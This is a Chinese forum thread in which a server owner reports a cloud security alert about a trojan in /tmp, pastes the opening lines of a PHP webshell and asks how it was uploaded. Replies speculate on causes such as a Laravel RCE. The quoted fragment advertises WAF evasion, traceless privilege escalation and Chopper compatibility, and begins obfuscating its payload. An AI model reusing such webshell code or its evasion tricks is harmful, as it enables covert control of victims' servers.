时间:2022-03-07 19:06:20,检测到存在未处理的木马文件:/tmp/phpN*****,您的服务器疑似被黑客入侵,可能造成严重损失,请即刻前往主机安全控制台(https://console.cloud.tencent.com/cwp )查看详细信息。
- <?php
$password='admin';//登录密码
//本次更新:体积优化、压缩优化、命令优化、反弹优化、文件管理优化、挂马清马优化等大量功能细节优化。
//功能特色:PHP高版本低版本都能执行,文件短小精悍,方便上传,功能强大,提权无痕迹,无视waf,过安全狗、云锁、360、阿里云、护卫神等主流waf。同时支持菜刀、xise连接。
$html='$password'.'='."'".$password."';".'@e#html'.''.'v'."".''.''."".''.''.''
这是什么情况,请教mjj这是从哪能上传到/tmp文件夹下的。
木马已经清理了,但是不知道从哪传的。
热议
2楼 葬爱家族 昨天23:37
文件发出来帮你看看
3楼 m556 昨天23:42
文件发出来帮你看看
https://netcut.cn/1ftiglrfu
4楼 小号专用马甲 昨天23:44
你得说明你服务器什么系统 安装了什么软件
用的什么php程序
开了什么端口
你这样问 谁能猜明白
5楼 那都通 昨天23:45
就是一个很普通的大马 网站发出来看看
6楼 hcyme 昨天23:46
看来还是坐鸡干净利落,没什么码子
7楼 xc55 昨天23:47
同意楼上,建议把网站发出来
8楼 m556 昨天23:49
你得说明你服务器什么系统 安装了什么软件
用的什么php程序
开了什么端口
上的腾讯轻量的宝塔CentOS 7.9.2009(Py3.7.9)
9楼 m556 昨天23:50
就是一个很普通的大马 网站发出来看看
放了好几个站在上面
10楼 920 昨天23:50
用了什么程序吗,TP 或者 laravel框架?
12楼 那都通 10小时前
放了好几个站在上面
你只管发出来就行,我帮你看看洞在哪
13楼 tkzx 10小时前
我也有这样的,关键我啥服务都没有部署,只有探针
14楼 920 1小时前
用的都是laravel 8.7
那可能是其他程序的漏洞了,Laravel <= 8.4.2 存在远程代码漏洞
15楼 monface 半小时前
我也经常遇到这种提醒,用的WP,但是看的时候,提醒的路径下已经没该木马文件。
16楼 darius 27分钟前
又是php
17楼 c7r1st 19分钟前
/tmp/ 是临时文件,图片上传也会经过这里。
18楼 wang3y2 19分钟前
框架漏洞吧
19楼 商务布丁 18分钟前
确实是小马程序
20楼 达雅 15分钟前
同样问题遇到过,宝塔面板最新版 wp5.9系统php7.3 之前是没装wp没遇到过这个,装了后有报毒,以为是wp问题,但看你应该没装wp,那就只能是php这类的问题了,目前我装了个宝塔上面第三方免费nx的防火墙,效果还不错
申明:本文内容由网友收集分享,仅供学习参考使用。如文中内容侵犯到您的利益,请在文章下方留言,本站会第一时间进行处理。